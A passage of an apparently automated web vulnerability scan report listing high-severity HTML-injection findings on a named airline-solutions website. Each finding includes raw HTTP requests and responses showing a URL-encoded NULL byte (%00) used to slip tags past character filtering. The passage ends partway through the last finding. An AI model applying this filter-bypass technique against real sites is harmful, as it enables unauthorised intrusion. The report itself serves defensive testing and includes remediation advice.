3.56. http://www.sabreairlinesolutions.com/home/contact/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %008f3cb"><a>f542c5fd65d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8f3cb"><a>f542c5fd65d in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/?%008f3cb"><a>f542c5fd65d=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321409; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fascend%2Farchive%2F%22%3Bi%3A1%3Bs%3A35%3A%22%2Fabout%2Fexecutive_team%2Fsanjay_nanda%2F%22%3Bi%3A2%3Bs%3A28%3A%22%2Fabout%2Fcomplete_the_picture%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:52:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321409; expires=Thu, 06-Oct-2011 09:52:56 GMT; path=/
Set-Cookie: exp_last_activity=1286376776; expires=Thu, 06-Oct-2011 09:52:56 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fascend%2Farchive%2F%22%3Bi%3A2%3Bs%3A35%3A%22%2Fabout%2Fexecutive_team%2Fsanjay_nanda%2F%22%3Bi%3A3%3Bs%3A28%3A%22%2Fabout%2Fcomplete_the_picture%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:53:13 GMT
Pragma: no-cache
Content-Length: 7182
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/contact/?%008f3cb"><a>f542c5fd65d=1">
...[SNIP]...

3.57. http://www.sabreairlinesolutions.com/home/contact/airline_distribution [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/airline_distribution

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f8621"><a>0262ec90d8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f8621"><a>0262ec90d8c in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/airline_distribution?%00f8621"><a>0262ec90d8c=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321476; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3Bi%3A4%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:47:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321476; expires=Thu, 06-Oct-2011 09:47:24 GMT; path=/
Set-Cookie: exp_last_activity=1286376444; expires=Thu, 06-Oct-2011 09:47:24 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fcontact%2Fairline_distribution%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A2%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A3%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A4%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:47:43 GMT
Pragma: no-cache
Content-Length: 7073
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/contact/airline_distribution?%00f8621"><a>0262ec90d8c=1">
...[SNIP]...

3.58. http://www.sabreairlinesolutions.com/home/contact/airline_distribution [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/airline_distribution

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %0072bb9<a>62a409e2a4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 72bb9<a>62a409e2a4b in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/airline_distribution?%0072bb9<a>62a409e2a4b=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321476; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3Bi%3A4%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:51:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321476; expires=Thu, 06-Oct-2011 09:51:00 GMT; path=/
Set-Cookie: exp_last_activity=1286376660; expires=Thu, 06-Oct-2011 09:51:00 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fcontact%2Fairline_distribution%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A2%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A3%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A4%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:51:06 GMT
Pragma: no-cache
Content-Length: 7069
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>62a409e2a4b=1">airline distribution?%0072bb9<a>62a409e2a4b=1</a>
...[SNIP]...

3.59. http://www.sabreairlinesolutions.com/home/contact/airline_distribution/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/airline_distribution/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00f69a5<a>8da31d06484 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f69a5<a>8da31d06484 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/airline_distribution/?%00f69a5<a>8da31d06484=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/contact
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321432; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fascend%2Fcontact%2F%22%3Bi%3A1%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A4%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Fmark_silagy%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:51:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321432; expires=Thu, 06-Oct-2011 09:51:16 GMT; path=/
Set-Cookie: exp_last_activity=1286376675; expires=Thu, 06-Oct-2011 09:51:16 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fcontact%2Fairline_distribution%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fascend%2Fcontact%2F%22%3Bi%3A2%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:51:25 GMT
Pragma: no-cache
Content-Length: 7125
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>8da31d06484=1">?%00f69a5<a>8da31d06484=1</a>
...[SNIP]...

3.60. http://www.sabreairlinesolutions.com/home/contact/airline_distribution/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/airline_distribution/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0028f11"><a>3cc3486bb3c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 28f11"><a>3cc3486bb3c in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/airline_distribution/?%0028f11"><a>3cc3486bb3c=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/contact
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321432; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fascend%2Fcontact%2F%22%3Bi%3A1%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A4%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Fmark_silagy%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:47:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321432; expires=Thu, 06-Oct-2011 09:47:30 GMT; path=/
Set-Cookie: exp_last_activity=1286376450; expires=Thu, 06-Oct-2011 09:47:30 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fcontact%2Fairline_distribution%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fascend%2Fcontact%2F%22%3Bi%3A2%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:47:52 GMT
Pragma: no-cache
Content-Length: 7129
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/contact/airline_distribution/?%0028f11"><a>3cc3486bb3c=1">
...[SNIP]...

3.61. http://www.sabreairlinesolutions.com/home/contact/airports [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/airports

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007fa3b"><a>75d7acc3fac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7fa3b"><a>75d7acc3fac in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/airports?%007fa3b"><a>75d7acc3fac=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321483; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3Bi%3A4%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:55:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321483; expires=Thu, 06-Oct-2011 09:55:34 GMT; path=/
Set-Cookie: exp_last_activity=1286376933; expires=Thu, 06-Oct-2011 09:55:34 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:55:57 GMT
Pragma: no-cache
Content-Length: 6741
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/contact/airports?%007fa3b"><a>75d7acc3fac=1">
...[SNIP]...

3.62. http://www.sabreairlinesolutions.com/home/contact/airports [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/airports

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00ab78d<a>f372b6bb1f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ab78d<a>f372b6bb1f8 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/airports?%00ab78d<a>f372b6bb1f8=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321483; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3Bi%3A4%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:59:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321483; expires=Thu, 06-Oct-2011 09:59:27 GMT; path=/
Set-Cookie: exp_last_activity=1286377166; expires=Thu, 06-Oct-2011 09:59:27 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:59:48 GMT
Pragma: no-cache
Content-Length: 6737
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>f372b6bb1f8=1">airports?%00ab78d<a>f372b6bb1f8=1</a>
...[SNIP]...

3.63. http://www.sabreairlinesolutions.com/home/contact/airports/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/airports/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f9d17"><a>b085801efdc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9d17"><a>b085801efdc in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/airports/?%00f9d17"><a>b085801efdc=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/contact
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321423; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A1%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A2%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3Bi%3A3%3Bs%3A13%3A%22%2Fnews_events%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:56:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321423; expires=Thu, 06-Oct-2011 09:56:26 GMT; path=/
Set-Cookie: exp_last_activity=1286376986; expires=Thu, 06-Oct-2011 09:56:26 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fcontact%2Fairports%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A8%3A%22%2Fsearch%2F%22%3Bi%3A3%3Bs%3A34%3A%22%2Fabout%2Fexecutive_team%2Filia_kostov%2F%22%3Bi%3A4%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:56:37 GMT
Pragma: no-cache
Content-Length: 6785
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/contact/airports/?%00f9d17"><a>b085801efdc=1">
...[SNIP]...

3.64. http://www.sabreairlinesolutions.com/home/contact/airports/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/airports/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %007842c<a>5631a4947eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7842c<a>5631a4947eb in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/airports/?%007842c<a>5631a4947eb=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/contact
